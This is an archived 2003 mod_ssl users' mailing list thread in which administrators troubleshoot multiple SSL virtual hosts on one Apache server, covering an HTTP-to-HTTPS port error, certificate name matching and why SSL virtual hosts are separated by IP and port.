------_=_NextPart_001_01C2D869.685D35E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 09:17:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EFE282AA024; Thu, 20 Feb 2003 09:17:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 4ADA12AA015
	for ; Thu, 20 Feb 2003 09:17:00 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h1K8Gvx2029223
	for ; Thu, 20 Feb 2003 09:16:57 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1K8Gq2M001815
	for ; Thu, 20 Feb 2003 09:16:56 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Multiple SSL VirtualHosts in apache
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Thu, 20 Feb 2003 09:16:52 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Multiple SSL VirtualHosts in apache
Thread-Index: AcLYS7Cp2Uvrt0M+SC+fnUuDAEWMZQAavoJw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: R. DuFresne [mailto:dufresne@sysinfo.com]
>
>It's IP and/or port based.  But, do remember, if port based then one is
>server only one cert, and the trouble is making sure the cert is
>constructed in a fashoin such that hostnames are not contained=20
>within the CN and such.  In this case, and others can correct me if I'm =

>wrong here, you would need to generate the cert on the IP rather then=20
>FDQN.  And I'm not sure openssl allows such a cert, but others might =
well be=20
>better clued then I on this .

A server cert bound to an IP address wouldn't make much sense (not sure =
if you can even do it).

The thing to remember is that SSL is about two things - encryption and =
authentication. For encryption to work you just need to send the =
server's public key to the client - the hostname is not important. =
However, for the authentication aspect, it is essential that the the =
common name in the server cert matches the FQDN in the client request. =
Put it another way, you surf to amazon.com and are about to type in your =
credit card number but then you look inside the server cert and see that =
it is registered to "shady-character.com". Do you still send your card =
number? This is why browsers always complain when you use a test or self =
signed certificate if the CN doesn't match the FQDN.

So, while you can have an encrypted session with an untrusted server, in =
the real world it doesn't make much sense to do so. Encryption is =
sending your money to the bank in an armoured car, authentication is =
making sure the armoured car actually goes to the bank.

Rgds,
Owen Boyle

>
>Thanks,
>
>Ron DuFresne
>
>On Wed, 19 Feb 2003, Jack L. Stone wrote:
>
>> Please excuse the top post:
>>=20
>> Ian or anyone, are you sure that a wildcard setup won't=20
>work....??? Just
>> getting ready to do a fresh install involvoing vhosts and=20
>this will become
>> an important issue.
>>=20
>> Thanks!
>>=20
>> At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
>> >I believe that I read somewhere that you must have a different
>> >ip address for each ssl virtualhost.
>> >
>> >Ian Moon
>> >
>> >On Wed, 19 Feb 2003, Boyle Owen wrote:
>> >
>> >> >-----Original Message-----
>> >> >From: Steve Pirk [mailto:orion@deathcon.com]
>> >> >Sent: Donnerstag, 6. Februar 2003 02:02
>> >> >To: modssl-users@modssl.org
>> >> >Subject: Multiple SSL VirtualHosts in apache
>> >> >
>> >> >
>> >> >I check the mail archives, but could not find a good
>> >> >answer for this "problem" I am having.
>> >> >
>> >> >I am building out a dev environment using apache
>> >> >on Solaris. The dev environment needs to run under
>> >> >SSL (to simulate the production environment). I am
>> >> >starting with 4 virtual servers. They all use the
>> >> >same cert file, but are on different ports.
>> >> >
>> >> >The problem I am running into is that only the "first"
>> >> >VirtualHost works. Requests to subsequent ports result
>> >> >in a mod_ssl:error:HTTP-request error. Here is the error_log
>> >> >entry:
>> >> >
>> >> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL=20
>handshake failed: HTTP
>> >> >spoken on HTTPS port; trying to send HTML error page=20
>(OpenSSL library
>> >> >error follows)
>> >>
>> >> This looks like you typed http://server:7001/ into the=20
>browser. You
>> >> still need to define https even if you have the port number, i.e.
>> >> https://server:7001/.
>> >>
>> >> Can you confirm that if you do this, you still get an error?
>> >>
>> >> Rgds,
>> >> Owen Boyle
>> >>
>> >>
>> >> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
>> >> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
>> >> >HTTP to HTTPS
>> >> >port!?]
>> >> >
>> >> >This is being used in conjunction with an auth package,
>> >> >but the redirect after logging in is https://
>> >> >
>> >> >Does anyone knnow of a good way to have multiple
>> >> >SSL virtual servers on one apache instance?
>> >>
>> >> The way you are doing it is fine. You just have a probelm...
>> >>
>> >> >
>> >> >Here is a sample of httpd.conf. In this case, port 7000
>> >> >works, but 7001 and 7002 get the mod_ssl error.
>> >> >
>> >> >  
>> >> >    DocumentRoot        /some/doc/root
>> >> >    SSLEngine on
>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >> >  
>> >> >
>> >> >  
>> >> >    DocumentRoot        /some/doc/root
>> >> >    SSLEngine on
>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >> >  
>> >> >
>> >> >  
>> >> >    DocumentRoot        /some/doc/root
>> >> >    SSLEngine on
>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>> >> >  
>> >> >
>> >> >--
>> >> >Steve (egrep)
>> >>=20
>>______________________________________________________________________
>> >> >Apache Interface to OpenSSL (mod_ssl)                  =20
>www.modssl.org
>> >> >User Support Mailing List                     =20
>modssl-users@modssl.org
>> >> >Automated List Manager                           =20
>majordomo@modssl.org
>> >> >
>> >>
>> >> This message is for the named person's use only. It may contain
>> >> confidential, proprietary or legally privileged information. No
>> >> confidentiality or privilege is waived or lost by any=20
>mistransmission.
>> >> If you receive this message in error, please notify the=20
>sender urgently
>> >> and then immediately delete the message and any copies of=20
>it from your
>> >> system. Please also immediately destroy any hardcopies of=20
>the message.
>> >> You must not, directly or indirectly, use, disclose,=20
>distribute, print,
>> >> or copy any part of this message if you are not the=20
>intended recipient.
>> >> The sender's company reserves the right to monitor all e-mail
>> >> communications through their networks. Any views expressed in this
>> >> message are those of the individual sender, except where=20
>the message
>> >> states otherwise and the sender is authorised to state=20
>them to be the
>> >> views of the sender's company.
>> >>
>> >>
>> >>=20
>______________________________________________________________________
>> >> Apache Interface to OpenSSL (mod_ssl)                  =20
www.modssl.org
> >> User Support Mailing List                      =
modssl-users@modssl.org
> >> Automated List Manager                            =
majordomo@modssl.org
> >>
> >
> =
>______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> >User Support Mailing List                      =
modssl-users@modssl.org
> >Automated List Manager                            =
majordomo@modssl.org
> >
> >
>=20
> Best regards,
> Jack L. Stone,
> Administrator
>=20
> Sage American
> http://www.sage-american.com
> jacks@sage-american.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20

--=20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 14:49:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0541E2AA02A; Thu, 20 Feb 2003 14:49:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sage-american.com (adsl-65-71-135-139.dsl.crchtx.swbell.net [65.71.135.139])
	by master.modssl.org (Postfix) with ESMTP id 5FEB72AA023
	for ; Thu, 20 Feb 2003 14:49:25 +0100 (CET)
Received: from sagea (sagea.sage-american [192.168.0.3])
	by sage-american.com (8.12.6/8.12.6) with SMTP id h1KDllFU001590;
	Thu, 20 Feb 2003 07:48:34 -0600 (CST)
	(envelope-from jackstone@sage-one.net)
Message-Id: <3.0.5.32.20030220074747.01da6d88@sage-one.net>
X-Sender: jackstone@sage-one.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Thu, 20 Feb 2003 07:47:47 -0600
To: modssl-users@modssl.org, 
From: "Jack L. Stone" 
Subject: RE: Multiple SSL VirtualHosts in apache
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jack L. Stone" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Owens' reply is more in line with what I thought. In applying for my Cert,
I provided docs to prove ownership of the www.domain, addresses and some
other stuff. When clicking on the website, the Cert requested must match
the domain requested -- nothing about IPs has ever been involved. 

This is why the post about IPs caught my attention and wondered if I was
behind the times. I'm applying for a renewal now and again it's all about
the www.domain and nothing is entered into the cert about the IP verification.

Then, there is the question of a wildcard cert which I understand can be
used for several vhosts without setting off alarms on the browser.

If there is anyone who would be willing to share with me their httpd.conf
setup when using vhosting, I would be forever greatful. Offlist would be
fine if need for privacy.

Thanks.....

>>
>>It's IP and/or port based.  But, do remember, if port based then one is
>>server only one cert, and the trouble is making sure the cert is
>>constructed in a fashoin such that hostnames are not contained 
>>within the CN and such.  In this case, and others can correct me if I'm 
>>wrong here, you would need to generate the cert on the IP rather then 
>>FDQN.  And I'm not sure openssl allows such a cert, but others might well
be 
>>better clued then I on this .
>
>A server cert bound to an IP address wouldn't make much sense (not sure if
you can even do it).
>
>The thing to remember is that SSL is about two things - encryption and
authentication. For encryption to work you just need to send the server's
public key to the client - the hostname is not important. However, for the
authentication aspect, it is essential that the the common name in the
server cert matches the FQDN in the client request. Put it another way, you
surf to amazon.com and are about to type in your credit card number but
then you look inside the server cert and see that it is registered to
"shady-character.com". Do you still send your card number? This is why
browsers always complain when you use a test or self signed certificate if
the CN doesn't match the FQDN.
>
>So, while you can have an encrypted session with an untrusted server, in
the real world it doesn't make much sense to do so. Encryption is sending
your money to the bank in an armoured car, authentication is making sure
the armoured car actually goes to the bank.
>
>Rgds,
>Owen Boyle
>
>>
>>Thanks,
>>
>>Ron DuFresne
>>
>>On Wed, 19 Feb 2003, Jack L. Stone wrote:
>>
>>> Please excuse the top post:
>>> 
>>> Ian or anyone, are you sure that a wildcard setup won't 
>>work....??? Just
>>> getting ready to do a fresh install involvoing vhosts and 
>>this will become
>>> an important issue.
>>> 
>>> Thanks!
>>> 
>>> At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
>>> >I believe that I read somewhere that you must have a different
>>> >ip address for each ssl virtualhost.
>>> >
>>> >Ian Moon
>>> >
>>> >On Wed, 19 Feb 2003, Boyle Owen wrote:
>>> >
>>> >> >-----Original Message-----
>>> >> >From: Steve Pirk [mailto:orion@deathcon.com]
>>> >> >Sent: Donnerstag, 6. Februar 2003 02:02
>>> >> >To: modssl-users@modssl.org
>>> >> >Subject: Multiple SSL VirtualHosts in apache
>>> >> >
>>> >> >
>>> >> >I check the mail archives, but could not find a good
>>> >> >answer for this "problem" I am having.
>>> >> >
>>> >> >I am building out a dev environment using apache
>>> >> >on Solaris. The dev environment needs to run under
>>> >> >SSL (to simulate the production environment). I am
>>> >> >starting with 4 virtual servers. They all use the
>>> >> >same cert file, but are on different ports.
>>> >> >
>>> >> >The problem I am running into is that only the "first"
>>> >> >VirtualHost works. Requests to subsequent ports result
>>> >> >in a mod_ssl:error:HTTP-request error. Here is the error_log
>>> >> >entry:
>>> >> >
>>> >> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL 
>>handshake failed: HTTP
>>> >> >spoken on HTTPS port; trying to send HTML error page 
>>(OpenSSL library
>>> >> >error follows)
>>> >>
>>> >> This looks like you typed http://server:7001/ into the 
>>browser. You
>>> >> still need to define https even if you have the port number, i.e.
>>> >> https://server:7001/.
>>> >>
>>> >> Can you confirm that if you do this, you still get an error?
>>> >>
>>> >> Rgds,
>>> >> Owen Boyle
>>> >>
>>> >>
>>> >> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
>>> >> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
>>> >> >HTTP to HTTPS
>>> >> >port!?]
>>> >> >
>>> >> >This is being used in conjunction with an auth package,
>>> >> >but the redirect after logging in is https://
>>> >> >
>>> >> >Does anyone knnow of a good way to have multiple
>>> >> >SSL virtual servers on one apache instance?
>>> >>
>>> >> The way you are doing it is fine. You just have a probelm...
>>> >>
>>> >> >
>>> >> >Here is a sample of httpd.conf. In this case, port 7000
>>> >> >works, but 7001 and 7002 get the mod_ssl error.
>>> >> >
>>> >> >  
>>> >> >    DocumentRoot        /some/doc/root
>>> >> >    SSLEngine on
>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>> >> >  
>>> >> >
>>> >> >  
>>> >> >    DocumentRoot        /some/doc/root
>>> >> >    SSLEngine on
>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>> >> >  
>>> >> >
>>> >> >  
>>> >> >    DocumentRoot        /some/doc/root
>>> >> >    SSLEngine on
>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>> >> >  


Best regards,
Jack L. Stone,
Administrator

SageOne Net
http://www.sage-one.net
jackstone@sage-one.net
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 15:21:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C74272AA02A; Thu, 20 Feb 2003 15:21:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 16AA52AA015
	for ; Thu, 20 Feb 2003 15:21:54 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h1KELpx2007584
	for ; Thu, 20 Feb 2003 15:21:51 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1KELnmM018510
	for ; Thu, 20 Feb 2003 15:21:49 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Multiple SSL VirtualHosts in apache
Date: Thu, 20 Feb 2003 15:21:49 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Multiple SSL VirtualHosts in apache
Importance: normal
thread-index: AcLY5xvH3lnudYsoQcu6V13aoPgYsQAA1yXA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Jack L. Stone [mailto:jackstone@sage-one.net]
>
>Then, there is the question of a wildcard cert which I 
>understand can be
>used for several vhosts without setting off alarms on the browser.

Search the archives for posts about wildcards - this comes up from time
to time and a few weeks ago John Airey gave a good summary of the
situation (basically, they're getting harder and harder to get).

>If there is anyone who would be willing to share with me their 
>httpd.conf setup when using vhosting, I would be forever greatful. 

It's no mystery - you just need to ensure that the different VHs are
distinguished at the TCP/IP layer (i.e. only one VH per IP/port number
pair). You cannot use application layer attributes (such as the Host
header) to define VHs because the SSL channel must be established before
any application layer traffic occurs.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

>Offlist would be
>fine if need for privacy.
>
>Thanks.....
>
>>>
>>>It's IP and/or port based.  But, do remember, if port based 
>then one is
>>>server only one cert, and the trouble is making sure the cert is
>>>constructed in a fashoin such that hostnames are not contained 
>>>within the CN and such.  In this case, and others can 
>correct me if I'm 
>>>wrong here, you would need to generate the cert on the IP 
>rather then 
>>>FDQN.  And I'm not sure openssl allows such a cert, but 
>others might well
>be 
>>>better clued then I on this .
>>
>>A server cert bound to an IP address wouldn't make much sense 
>(not sure if
>you can even do it).
>>
>>The thing to remember is that SSL is about two things - encryption and
>authentication. For encryption to work you just need to send 
>the server's
>public key to the client - the hostname is not important. 
>However, for the
>authentication aspect, it is essential that the the common name in the
>server cert matches the FQDN in the client request. Put it 
>another way, you
>surf to amazon.com and are about to type in your credit card number but
>then you look inside the server cert and see that it is registered to
>"shady-character.com". Do you still send your card number? This is why
>browsers always complain when you use a test or self signed 
>certificate if
>the CN doesn't match the FQDN.
>>
>>So, while you can have an encrypted session with an untrusted 
>server, in
>the real world it doesn't make much sense to do so. Encryption 
>is sending
>your money to the bank in an armoured car, authentication is 
>making sure
>the armoured car actually goes to the bank.
>>
>>Rgds,
>>Owen Boyle
>>
>>>
>>>Thanks,
>>>
>>>Ron DuFresne
>>>
>>>On Wed, 19 Feb 2003, Jack L. Stone wrote:
>>>
>>>> Please excuse the top post:
>>>> 
>>>> Ian or anyone, are you sure that a wildcard setup won't 
>>>work....??? Just
>>>> getting ready to do a fresh install involvoing vhosts and 
>>>this will become
>>>> an important issue.
>>>> 
>>>> Thanks!
>>>> 
>>>> At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
>>>> >I believe that I read somewhere that you must have a different
>>>> >ip address for each ssl virtualhost.
>>>> >
>>>> >Ian Moon
>>>> >
>>>> >On Wed, 19 Feb 2003, Boyle Owen wrote:
>>>> >
>>>> >> >-----Original Message-----
>>>> >> >From: Steve Pirk [mailto:orion@deathcon.com]
>>>> >> >Sent: Donnerstag, 6. Februar 2003 02:02
>>>> >> >To: modssl-users@modssl.org
>>>> >> >Subject: Multiple SSL VirtualHosts in apache
>>>> >> >
>>>> >> >
>>>> >> >I check the mail archives, but could not find a good
>>>> >> >answer for this "problem" I am having.
>>>> >> >
>>>> >> >I am building out a dev environment using apache
>>>> >> >on Solaris. The dev environment needs to run under
>>>> >> >SSL (to simulate the production environment). I am
>>>> >> >starting with 4 virtual servers. They all use the
>>>> >> >same cert file, but are on different ports.
>>>> >> >
>>>> >> >The problem I am running into is that only the "first"
>>>> >> >VirtualHost works. Requests to subsequent ports result
>>>> >> >in a mod_ssl:error:HTTP-request error. Here is the error_log
>>>> >> >entry:
>>>> >> >
>>>> >> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL 
>>>handshake failed: HTTP
>>>> >> >spoken on HTTPS port; trying to send HTML error page 
>>>(OpenSSL library
>>>> >> >error follows)
>>>> >>
>>>> >> This looks like you typed http://server:7001/ into the 
>>>browser. You
>>>> >> still need to define https even if you have the port 
>number, i.e.
>>>> >> https://server:7001/.
>>>> >>
>>>> >> Can you confirm that if you do this, you still get an error?
>>>> >>
>>>> >> Rgds,
>>>> >> Owen Boyle
>>>> >>
>>>> >>
>>>> >> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
>>>> >> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
>>>> >> >HTTP to HTTPS
>>>> >> >port!?]
>>>> >> >
>>>> >> >This is being used in conjunction with an auth package,
>>>> >> >but the redirect after logging in is https://
>>>> >> >
>>>> >> >Does anyone knnow of a good way to have multiple
>>>> >> >SSL virtual servers on one apache instance?
>>>> >>
>>>> >> The way you are doing it is fine. You just have a probelm...
>>>> >>
>>>> >> >
>>>> >> >Here is a sample of httpd.conf. In this case, port 7000
>>>> >> >works, but 7001 and 7002 get the mod_ssl error.
>>>> >> >
>>>> >> >  
>>>> >> >    DocumentRoot        /some/doc/root
>>>> >> >    SSLEngine on
>>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>>> >> >  
>>>> >> >
>>>> >> >  
>>>> >> >    DocumentRoot        /some/doc/root
>>>> >> >    SSLEngine on
>>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>>> >> >  
>>>> >> >
>>>> >> >  
>>>> >> >    DocumentRoot        /some/doc/root
>>>> >> >    SSLEngine on
>>>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
>>>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
>>>> >> >  
>
>
>Best regards,
>Jack L. Stone,
>Administrator
>
>SageOne Net
>http://www.sage-one.net
>jackstone@sage-one.net
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 15:52:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 863512AA02A; Thu, 20 Feb 2003 15:52:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 23D602AA015
	for ; Thu, 20 Feb 2003 15:52:09 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA13017;
	Thu, 20 Feb 2003 09:47:29 -0500
Date: Thu, 20 Feb 2003 09:47:28 -0500 (EST)
From: "R. DuFresne" 
To: "Jack L. Stone" 
Cc: modssl-users@modssl.org, modssl-users@modssl.org
Subject: RE: Multiple SSL VirtualHosts in apache
In-Reply-To: <3.0.5.32.20030220074747.01da6d88@sage-one.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Yes, and thanks to Owen for rounding out our, mine and yours, knowledge
levels on this.  I seem to have forgotten the FDQN is what the browsing
public is used to for web traversals.  Few fall back to IP's even in times
when DNS is borked.  I get firewall-1 licesning issues and cert issues
confused at times.  Hopefully I did not mislead anyone .

Thanks,

Ron DuFresne

On Thu, 20 Feb 2003, Jack L. Stone wrote:

> Owens' reply is more in line with what I thought. In applying for my Cert,
> I provided docs to prove ownership of the www.domain, addresses and some
> other stuff. When clicking on the website, the Cert requested must match
> the domain requested -- nothing about IPs has ever been involved. 
> 
> This is why the post about IPs caught my attention and wondered if I was
> behind the times. I'm applying for a renewal now and again it's all about
> the www.domain and nothing is entered into the cert about the IP verification.
> 
> Then, there is the question of a wildcard cert which I understand can be
> used for several vhosts without setting off alarms on the browser.
> 
> If there is anyone who would be willing to share with me their httpd.conf
> setup when using vhosting, I would be forever greatful. Offlist would be
> fine if need for privacy.
> 
> Thanks.....
> 
> >>
> >>It's IP and/or port based.  But, do remember, if port based then one is
> >>server only one cert, and the trouble is making sure the cert is
> >>constructed in a fashoin such that hostnames are not contained 
> >>within the CN and such.  In this case, and others can correct me if I'm 
> >>wrong here, you would need to generate the cert on the IP rather then 
> >>FDQN.  And I'm not sure openssl allows such a cert, but others might well
> be 
> >>better clued then I on this .
> >
> >A server cert bound to an IP address wouldn't make much sense (not sure if
> you can even do it).
> >
> >The thing to remember is that SSL is about two things - encryption and
> authentication. For encryption to work you just need to send the server's
> public key to the client - the hostname is not important. However, for the
> authentication aspect, it is essential that the the common name in the
> server cert matches the FQDN in the client request. Put it another way, you
> surf to amazon.com and are about to type in your credit card number but
> then you look inside the server cert and see that it is registered to
> "shady-character.com". Do you still send your card number? This is why
> browsers always complain when you use a test or self signed certificate if
> the CN doesn't match the FQDN.
> >
> >So, while you can have an encrypted session with an untrusted server, in
> the real world it doesn't make much sense to do so. Encryption is sending
> your money to the bank in an armoured car, authentication is making sure
> the armoured car actually goes to the bank.
> >
> >Rgds,
> >Owen Boyle
> >
> >>
> >>Thanks,
> >>
> >>Ron DuFresne
> >>
> >>On Wed, 19 Feb 2003, Jack L. Stone wrote:
> >>
> >>> Please excuse the top post:
> >>> 
> >>> Ian or anyone, are you sure that a wildcard setup won't 
> >>work....??? Just
> >>> getting ready to do a fresh install involvoing vhosts and 
> >>this will become
> >>> an important issue.
> >>> 
> >>> Thanks!
> >>> 
> >>> At 10:02 AM 2.19.2003 -0700, Ian Moon wrote:
> >>> >I believe that I read somewhere that you must have a different
> >>> >ip address for each ssl virtualhost.
> >>> >
> >>> >Ian Moon
> >>> >
> >>> >On Wed, 19 Feb 2003, Boyle Owen wrote:
> >>> >
> >>> >> >-----Original Message-----
> >>> >> >From: Steve Pirk [mailto:orion@deathcon.com]
> >>> >> >Sent: Donnerstag, 6. Februar 2003 02:02
> >>> >> >To: modssl-users@modssl.org
> >>> >> >Subject: Multiple SSL VirtualHosts in apache
> >>> >> >
> >>> >> >
> >>> >> >I check the mail archives, but could not find a good
> >>> >> >answer for this "problem" I am having.
> >>> >> >
> >>> >> >I am building out a dev environment using apache
> >>> >> >on Solaris. The dev environment needs to run under
> >>> >> >SSL (to simulate the production environment). I am
> >>> >> >starting with 4 virtual servers. They all use the
> >>> >> >same cert file, but are on different ports.
> >>> >> >
> >>> >> >The problem I am running into is that only the "first"
> >>> >> >VirtualHost works. Requests to subsequent ports result
> >>> >> >in a mod_ssl:error:HTTP-request error. Here is the error_log
> >>> >> >entry:
> >>> >> >
> >>> >> >[Wed Feb  5 16:45:11 2003] [error] mod_ssl: SSL 
> >>handshake failed: HTTP
> >>> >> >spoken on HTTPS port; trying to send HTML error page 
> >>(OpenSSL library
> >>> >> >error follows)
> >>> >>
> >>> >> This looks like you typed http://server:7001/ into the 
> >>browser. You
> >>> >> still need to define https even if you have the port number, i.e.
> >>> >> https://server:7001/.
> >>> >>
> >>> >> Can you confirm that if you do this, you still get an error?
> >>> >>
> >>> >> Rgds,
> >>> >> Owen Boyle
> >>> >>
> >>> >>
> >>> >> >[Wed Feb  5 16:45:11 2003] [error] OpenSSL: error:1407609C:SSL
> >>> >> >routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking
> >>> >> >HTTP to HTTPS
> >>> >> >port!?]
> >>> >> >
> >>> >> >This is being used in conjunction with an auth package,
> >>> >> >but the redirect after logging in is https://
> >>> >> >
> >>> >> >Does anyone knnow of a good way to have multiple
> >>> >> >SSL virtual servers on one apache instance?
> >>> >>
> >>> >> The way you are doing it is fine. You just have a probelm...
> >>> >>
> >>> >> >
> >>> >> >Here is a sample of httpd.conf. In this case, port 7000
> >>> >> >works, but 7001 and 7002 get the mod_ssl error.
> >>> >> >
> >>> >> >  
> >>> >> >    DocumentRoot        /some/doc/root
> >>> >> >    SSLEngine on
> >>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >>> >> >  
> >>> >> >
